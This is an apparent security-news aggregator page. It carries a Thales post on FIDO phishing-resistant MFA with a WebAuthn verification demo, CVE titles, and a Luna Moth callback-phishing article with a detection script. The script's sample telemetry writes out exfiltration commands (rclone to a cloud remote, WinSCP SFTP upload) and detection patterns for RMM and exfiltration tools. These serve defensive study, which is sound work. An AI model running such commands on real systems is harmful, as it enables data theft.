Aggregator
CVE-2025-29824: a zero-day vulnerability and a malicious DLL took up residence in the "Music" folder
Phishing-Resistant MFA: Why FIDO is Essential
madhav
Thu, 05/08/2025 - 04:47
Phishing attacks are one of the most pervasive and insidious threats, with businesses facing increasingly sophisticated and convincing attacks that exploit human error. Traditional Multi-Factor Authentication (MFA), while a step up from password-only security, is no longer enough to fight modern phishing schemes.
Today's threat actors use AI to craft convincing phishing campaigns and advanced social engineering to slip past MFA, resulting in credential theft and account takeovers. As attackers refine their methods, organizations must adopt phishing-resistant multi-factor authentication to secure their digital identities.
The FIDO Alliance's standards (FIDO2, comprising WebAuthn and CTAP) stand out as a robust solution: they let businesses implement authentication that removes the dependence on passwords and mitigates phishing risk by design rather than by user vigilance.
The Rising Threat of Phishing and Credential-Based Attacks
As malicious actors evolve their tactics, adding AI to their toolset and automating campaigns at unprecedented scale, phishing remains a top initial access vector. According to Thales's 2024 Data Threat Report, 93% of enterprises reported a rise in threats, and phishing was identified as one of the three fastest-growing attack types, named by 36% of respondents. AI-assisted phishing can clone legitimate websites convincingly and manipulate users into divulging credentials and sensitive data.
Credential theft is particularly dangerous as it facilitates account takeovers, lateral movement within networks, and access to critical business systems. Attackers can leverage these stolen credentials to slip through perimeter defenses, compromise cloud environments, and carry out ransomware attacks.
High-profile breaches illustrate the devastating impact of credential-based attacks. For instance, a breach at a hospitality company was reportedly initiated through social engineering that exploited weak authentication controls. Similarly, in a data breach at a large technology company, attackers tricked an employee into approving an MFA prompt, highlighting the limits of conventional MFA. These incidents underline the need for firms to adopt phishing-resistant multi-factor authentication mechanisms such as FIDO.
How FIDO Standards Enhance MFA Security
To fight phishing effectively, authentication must stop relying on shared secrets such as passwords and one-time codes, since anything a user can type can be captured and relayed. Phishing-resistant MFA ensures that even if a user is deceived, the attacker obtains nothing reusable and cannot complete a login to the genuine service.
FIDO standards provide a basis for strong authentication by replacing passwords with public/private key pairs: the authenticator generates a key pair per service at registration, keeps the private key, and gives the relying party only the public key. The key principles of FIDO authentication include:
- Public-key cryptography: each login is a signature over a server-issued challenge. The private key never leaves the authenticator and the server stores only public keys, so nothing reusable can be intercepted in transit or stolen from a breached credential database.
- Anti-phishing: each credential is bound to the relying party's domain (RP ID), and the browser stamps the actual page origin into the signed client data. A look-alike domain cannot invoke the credential, and an assertion relayed from a fake site fails the relying party's origin check.
- Device-bound passkeys: for high-risk scenarios, the private key can be confined to the device on which it was generated rather than synced through a cloud account, so authentication can only occur on that device. The device can be a hardware FIDO security key, a mobile phone or a laptop.
- Biometric and hardware-based security: the authenticator is unlocked locally with a biometric such as a fingerprint or with a PIN, and neither is ever sent to the server. Offering a biometric instead of a PIN eases and accelerates FIDO adoption.
FIDO-based authentication addresses the weaknesses of traditional MFA factors such as one-time passcodes (OTPs) and push notifications: an adversary-in-the-middle proxy can relay an OTP to the real site in real time, and push approvals can be extracted through prompt fatigue or a convincing phone call. Because a FIDO assertion is a signature over the relying party's fresh challenge together with the origin the browser observed, it cannot be used outside the legitimate authentication flow, which renders credential phishing ineffective.
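To make the origin binding concrete, here is an added example (not code from the original post or from Thales) of the relying-party side of a WebAuthn authentication ceremony in Python, using only the standard library. It simulates the three parties (browser, authenticator, relying party), runs a genuine login, a login relayed from a look-alike phishing origin, and a replay of a captured assertion, and shows which check rejects each. The hostnames bank.example and bank-example.phish are illustrative assumptions, and the P-256 ECDSA is a textbook affine implementation included only so the block runs offline; it is not constant-time and is not a substitute for a vetted library.

```python
"""Added example: minimal WebAuthn relying-party checks showing why a FIDO assertion
cannot be phished or replayed. Toy P-256 ECDSA (textbook, NOT constant-time) is
included only so this runs with the standard library. bank.example / bank-example.phish
are illustrative assumptions, not real services."""
import base64, hashlib, json, os, secrets, struct

# --- toy P-256 ECDSA --------------------------------------------------------
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)

def _add(p, q):                      # affine point addition; None = point at infinity
    if p is None: return q
    if q is None: return p
    if p[0] == q[0] and (p[1] + q[1]) % P == 0: return None
    if p == q: lam = (3 * p[0] * p[0] - 3) * pow(2 * p[1] % P, -1, P) % P
    else:      lam = (q[1] - p[1]) * pow((q[0] - p[0]) % P, -1, P) % P
    x = (lam * lam - p[0] - q[0]) % P
    return x, (lam * (p[0] - x) - p[1]) % P

def _mul(k, pt):                     # double-and-add scalar multiplication
    r = None
    while k:
        if k & 1: r = _add(r, pt)
        pt, k = _add(pt, pt), k >> 1
    return r

def ecdsa_sign(d, msg):
    e = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    while True:
        k = secrets.randbelow(N - 1) + 1
        r = _mul(k, G)[0] % N
        s = pow(k, -1, N) * (e + r * d) % N
        if r and s: return r, s

def ecdsa_verify(Q, msg, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N): return False
    e = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    w = pow(s, -1, N)
    R = _add(_mul(e * w % N, G), _mul(r * w % N, Q))
    return R is not None and R[0] % N == r

# --- WebAuthn "get" ceremony, three parties ---------------------------------
def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def browser_client_data(origin, challenge):
    # The *browser* fills in origin; page script (or a phishing proxy) cannot forge it.
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                       "origin": origin}).encode()

def authenticator_get_assertion(priv, rp_id, client_data, sign_count):
    # authenticatorData = rpIdHash(32) || flags(1, UP|UV set) || signCount(4)
    auth_data = (hashlib.sha256(rp_id.encode()).digest() + bytes([0x05])
                 + struct.pack(">I", sign_count))
    sig = ecdsa_sign(priv, auth_data + hashlib.sha256(client_data).digest())
    return auth_data, sig

def verify_assertion(cred, expected_challenge, client_data, auth_data, sig,
                     rp_id="bank.example", allowed_origins=("https://bank.example",)):
    """Relying-party checks from WebAuthn section 7.2 (abridged). Returns (ok, reason)."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (stale or replayed assertion)"
    if cd.get("origin") not in allowed_origins:
        return False, f"origin {cd.get('origin')!r} not allowed"      # the phishing case
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    count = struct.unpack(">I", auth_data[33:37])[0]
    if count and count <= cred["sign_count"]:
        return False, "signature counter did not increase (cloned authenticator?)"
    if not ecdsa_verify(cred["pub"], auth_data + hashlib.sha256(client_data).digest(), sig):
        return False, "bad signature"
    cred["sign_count"] = count
    return True, "ok"

def demo():
    priv = secrets.randbelow(N - 1) + 1
    cred = {"pub": _mul(priv, G), "sign_count": 0}    # what the RP stored at registration
    # 1. Genuine login from the real origin.
    chal = os.urandom(32)
    cd = browser_client_data("https://bank.example", chal)
    ad, sig = authenticator_get_assertion(priv, "bank.example", cd, 1)
    legit = verify_assertion(cred, chal, cd, ad, sig)
    # 2. Adversary-in-the-middle: the proxy relays the RP's real challenge to the victim at
    #    https://bank-example.phish. The browser stamps *that* origin into the signed client
    #    data, so a fresh, validly signed assertion is still rejected. (A real browser would
    #    refuse to invoke the authenticator at all: rp_id is not a suffix of the page origin.)
    chal2 = os.urandom(32)
    cd2 = browser_client_data("https://bank-example.phish", chal2)
    ad2, sig2 = authenticator_get_assertion(priv, "bank.example", cd2, 2)
    phished = verify_assertion(cred, chal2, cd2, ad2, sig2)
    # 3. Replay of the captured genuine assertion against a new challenge.
    replayed = verify_assertion(cred, os.urandom(32), cd, ad, sig)
    return legit, phished, replayed

if __name__ == "__main__":
    for label, res in zip(("genuine", "phished", "replayed"), demo()):
        print(f"{label:9s} -> {res}")
```

The phished assertion carries a perfectly valid signature; what causes the rejection is the origin field inside the signed clientDataJSON, written by the browser rather than by the page. Contrast this with an OTP, where nothing in the code the user types says which site asked for it.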
The Business Benefits of Phishing-Resistant MFA
Adopting phishing-resistant MFA gives organizations a range of security and operational benefits, including:
- Better Security and User Experience: Passwords are ineffective, as people struggle to remember unique passwords for each account, which often results in weak passwords or the reuse of the same password across multiple platforms, compromising security. FIDO authentication streamlines the process, allowing users to authenticate securely with biometrics and/or hardware security keys without the risk of credential theft.
- Regulatory Compliance and Cybersecurity Framework Alignment: Many regulations and frameworks, including the NIST Cybersecurity Framework, ISO 27001, GDPR and DORA, call for strong authentication, and NIST SP 800-63B explicitly defines phishing-resistant (verifier-impersonation-resistant) authenticators. FIDO-based solutions help firms meet these requirements while limiting the risk of data breaches.
- Lower Operational Costs: Password resets and account recovery processes are a hefty burden for IT teams, and replacing passwords with phishing-resistant authentication helps businesses dramatically cut support costs and improve workforce productivity.
Thales provides phishing-resistant authentication solutions that help businesses protect their digital identities. With a suite of FIDO-certified authentication devices, Thales enables companies to implement secure, scalable, and user-friendly identity security. Thales’ solutions integrate flawlessly with third parties or Thales identity and access management (IAM) frameworks, offering a future-proof approach to eradicating password-based vulnerabilities.
Phishing attacks are becoming more sophisticated, making traditional MFA insufficient for protecting digital identities. Organizations must adopt phishing-resistant MFA to mitigate credential theft and account takeovers. By leveraging Thales’ expertise in cybersecurity and identity protection, entities can stay ahead of evolving phishing threats and maintain compliance with industry regulations.
FIDO-based authentication gives firms a robust security framework, eliminating passwords and ensuring strong, phishing-proof access controls. Businesses looking to enhance security while improving user experience should explore Thales’ authentication solutions.
Download our Phishing-Resistant MFA eBook and Passwordless 360 Report to learn more.
Identity & Access Management Sarah Lefavrais | IAM Product Marketing Manager
Schema
{
"@context": "https://schema.org",
"@type": "BlogPosting",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://cpl.thalesgroup.com/blog/access-management/fido-phishing-resistant-mfa-authentication"
},
"headline": "Why FIDO is Critical for Phishing-Resistant MFA",
"description": "Explore how FIDO-based MFA helps businesses eliminate phishing threats, enhance user security, and meet compliance standards with Thales solutions.",
"image": "",
"author": {
"@type": "Person",
"name": "Sarah Lefavrais",
"url": "https://cpl.thalesgroup.com/blog/author/slefavrais"
},
"publisher": {
"@type": "Organization",
"name": "Thales Group",
"description": "The world relies on Thales to protect and secure access to your most sensitive data and software wherever it is created, shared, or stored. Whether building an encryption strategy, licensing software, providing trusted access to the cloud, or meeting compliance mandates, you can rely on Thales to secure your digital transformation.",
"url": "https://cpl.thalesgroup.com",
"logo": "https://cpl.thalesgroup.com/sites/default/files/content/footer/thaleslogo-white.png",
"sameAs": [
"https://www.facebook.com/ThalesCloudSec",
"https://www.twitter.com/ThalesCloudSec",
"https://www.linkedin.com/company/thalescloudsec",
"https://www.youtube.com/ThalesCloudSec"
]
},
"datePublished": "2025-05-08",
"dateModified": "2025-05-08"
}
The post Phishing-Resistant MFA: Why FIDO is Essential appeared first on Security Boulevard.
CVE-2019-17563 | Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Generic session fixation
CVE-2020-2594 | Oracle Primavera P6 Enterprise Project Portfolio Management Project Manager denial of service
CVE-2020-2706 | Oracle Primavera P6 Enterprise Project Portfolio Management Project Manager
CVE-2020-2852 | Oracle Advanced Outbound Telephony 12.1.1/12.1.2/12.1.3 Calendar
CVE-2020-2871 | Oracle Advanced Outbound Telephony up to 12.2.9 User Interface
CVE-2020-2854 | Oracle Advanced Outbound Telephony 12.1.1/12.1.2/12.1.3 User Interface
CVE-2020-2856 | Oracle Advanced Outbound Telephony 12.1.1/12.1.2/12.1.3 User Interface
CVE-2020-2857 | Oracle Advanced Outbound Telephony 12.1.1/12.1.2/12.1.3 User Interface
CVE-2020-2890 | Oracle Applications Framework up to 12.2.9 Diagnostics
Global cybersecurity readiness remains critically low
Only 4% of organizations worldwide have achieved the 'mature' level of readiness required to withstand cybersecurity threats, according to Cisco's 2025 Cybersecurity Readiness Index. This is a slight increase from last year's index, in which 3% of organizations worldwide were designated as mature. This demonstrates that despite a slight improvement from last year, global cybersecurity preparedness remains low as hyperconnectivity and AI introduce new complexities for security practitioners.
AI is changing the threat landscape
AI …
The post Global cybersecurity readiness remains critically low appeared first on Help Net Security.
CVE-2023-20198
Xiaohongshu partners with Tmall: from "seeding" (种草) to "direct-to-purchase seeding"
660 million users: Skype, the "grandfather of video chat", officially shuts down. Why do people miss it?
Healthcare workers regularly upload sensitive data to GenAI, cloud accounts
Healthcare organizations are facing a growing data security challenge from within, according to a new report from Netskope Threat Labs. The analysis reveals that employees in the sector are frequently attempting to upload sensitive information, including potentially protected health data, to unauthorized websites and cloud services. Among the most common destinations are AI tools like ChatGPT and Gemini.
Healthcare GenAI data policy violations
Over the past 12 months, 81% of all data policy violations in …
The post Healthcare workers regularly upload sensitive data to GenAI, cloud accounts appeared first on Help Net Security.
Luna Moth extortion hackers impersonate IT help desks to breach US companies at scale
The data-theft extortion group known as Luna Moth, also called Silent Ransom Group, has stepped up callback phishing attacks against US legal and financial institutions.
According to EclecticIQ researcher Arda Büyükkaya, the ultimate goal of these attacks is data theft and extortion.
Luna Moth, which calls itself Silent Ransom Group, previously ran BazarCall campaigns to obtain initial access to corporate networks for Ryuk and later Conti ransomware attacks.
In March 2022, as Conti began shutting down, the BazarCall threat group split from the Conti syndicate and formed a new group called Silent Ransom Group (SRG).
Luna Moth's recent attacks impersonate IT support staff through email, fake websites and phone calls, relying entirely on social engineering and deception; no ransomware was deployed in any of the cases.
The security firm assesses that, as of March 2025, Luna Moth may have registered at least 37 domains through GoDaddy to support its callback phishing campaigns.
Most of these domains typosquat the IT help desk or support portals of major US law firms and financial services companies.
Luna Moth targets over the past 12 months
The latest campaign spotted by EclecticIQ began in March 2025 and targets US organizations with malicious emails containing fake help desk phone numbers; recipients are urged to call to resolve a problem that does not exist.
A Luna Moth operator posing as IT staff answers the call and persuades the victim to install remote monitoring and management (RMM) software from a fake IT help desk site, giving the attacker remote access to the machine.
The fake help desk sites use domains that follow naming patterns such as [company_name]-helpdesk.com and [company_name]helpdesk.com.
Fake IT support site
Tools abused in these attacks include Syncro, SuperOps, Zoho Assist, Atera, AnyDesk and Splashtop. All are legitimate, digitally signed tools, so they are unlikely to trigger any warning for the victim.
Once the RMM tool is installed, the attacker has hands-on-keyboard access, allowing them to spread to other devices and search local files and shared drives for sensitive data.
After locating valuable files, they exfiltrate them to attacker-controlled infrastructure using WinSCP (over SFTP) or Rclone (cloud sync).
Once the data is stolen, Luna Moth contacts the victim organization and threatens to publish it on the group's clearnet domain unless a ransom is paid. Demands vary per victim, ranging from US$1 million to US$8 million.
Luna Moth extortion site
Büyükkaya commented on the stealth of these attacks, noting that they involve no malware, no malicious attachments and no links to malware sites: victims install the RMM tool themselves, believing they are receiving help desk support. Because enterprises commonly use these RMM tools, security software does not flag them as malicious and allows them to run. He recommends considering restricting the execution of RMM tools that are not used in the organization's environment.
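Following the recommendation above, here is an added example (not EclecticIQ's or the article's code) of how a detection team could hunt for this chain in endpoint telemetry: flag RMM products named in the report that the organization does not sanction, flag Rclone or WinSCP invocations pointing at a remote, raise the severity when both occur on the same host within a window, and separately screen observed domains for the [company]-helpdesk.com pattern. The binary-name markers, the sanctioned-RMM list, the organization's own help desk domain and the sample events are all constructed assumptions for illustration.

```python
"""Added example: hunting the Luna Moth-style callback-phishing chain over constructed
process-creation and DNS records. Not EclecticIQ's or the article's code. Binary-name
markers, the sanctioned-RMM set, ORG_HELPDESK_DOMAINS and the sample data are assumptions."""
import re
from datetime import datetime, timedelta

# Image-name fragments for the RMM products named in the report (assumed, matched case-insensitively).
RMM_MARKERS = {"syncro": "Syncro", "superops": "SuperOps", "zohoassist": "Zoho Assist",
               "za_access": "Zoho Assist", "atera": "Atera", "anydesk": "AnyDesk",
               "splashtop": "Splashtop", "srmanager": "Splashtop"}
SANCTIONED_RMM = {"Atera"}                    # assumption: the only RMM this org actually uses
ORG_HELPDESK_DOMAINS = {"acme-helpdesk.com"}  # assumption: the org's genuine support portal
HELPDESK_RE = re.compile(r"^[a-z0-9]+-?helpdesk\.com$")
# rclone remotes look like "name:path"; exclude Windows drive letters such as c:\...
RCLONE_REMOTE_RE = re.compile(r"\b(copy|sync|move)\b.*\s[a-z0-9_-]+:(?![\\/])")

def classify_process(ev):
    """Return (kind, detail) for a suspicious process-creation event, else None."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev.get("command_line", "").lower()
    for marker, product in RMM_MARKERS.items():
        if marker in image and product not in SANCTIONED_RMM:
            return "unsanctioned_rmm", product
    if image == "rclone.exe" and RCLONE_REMOTE_RE.search(cmd):
        return "exfil", "rclone to a cloud remote"
    if image in ("winscp.exe", "winscp.com") and ("sftp://" in cmd or "/script" in cmd):
        return "exfil", "WinSCP SFTP transfer"
    return None

def hunt(events, window_hours=24):
    """Per host: an unsanctioned RMM followed by an exfil tool within the window is high severity."""
    alerts, first_rmm = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        hit = classify_process(ev)
        if hit is None:
            continue
        kind, detail = hit
        t = datetime.fromisoformat(ev["time"])
        if kind == "unsanctioned_rmm":
            first_rmm.setdefault(ev["host"], t)
            alerts.append({"host": ev["host"], "severity": "medium",
                           "why": f"{detail} is not a sanctioned RMM tool"})
        else:
            start = first_rmm.get(ev["host"])
            chain = start is not None and start <= t <= start + timedelta(hours=window_hours)
            alerts.append({"host": ev["host"], "severity": "high" if chain else "medium",
                           "why": detail + (" after unsanctioned RMM install" if chain else "")})
    return alerts

def suspicious_helpdesk_domains(domains):
    """Domains following [company]-helpdesk.com / [company]helpdesk.com, minus the org's own."""
    return sorted(d for d in domains
                  if HELPDESK_RE.match(d.lower()) and d.lower() not in ORG_HELPDESK_DOMAINS)

# Constructed sample telemetry (Sysmon-style process creation, reduced to a few fields).
SAMPLE_EVENTS = [
    {"time": "2025-03-10T09:02:11", "host": "WS01", "user": "alice",
     "image": r"C:\Users\alice\Downloads\AnyDesk.exe", "command_line": "anydesk.exe"},
    {"time": "2025-03-10T11:40:53", "host": "WS01", "user": "alice",
     "image": r"C:\Users\alice\Downloads\rclone.exe",
     "command_line": r'rclone.exe copy "C:\Share\Legal" mega:cases --transfers 8'},
    {"time": "2025-03-10T08:00:00", "host": "WS02", "user": "SYSTEM",
     "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe", "command_line": ""},
    {"time": "2025-03-11T14:15:00", "host": "WS03", "user": "bob",
     "image": r"C:\Tools\WinSCP.com",
     "command_line": r"winscp.com /script=C:\Tools\up.txt sftp://x@203.0.113.7/"},
]
SAMPLE_DOMAINS = ["acme-helpdesk.com", "acmehelpdesk.com", "bigfirm-helpdesk.com", "microsoft.com"]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
    print(suspicious_helpdesk_domains(SAMPLE_DOMAINS))
```

The sanctioned Atera agent on WS02 produces nothing, WS03's lone WinSCP transfer is medium, and WS01's AnyDesk install followed two hours later by an rclone copy to a cloud remote is the high-severity pattern the report describes. An allowlist of RMM products, enforced with application control rather than just detected, is the preventive counterpart to this hunt.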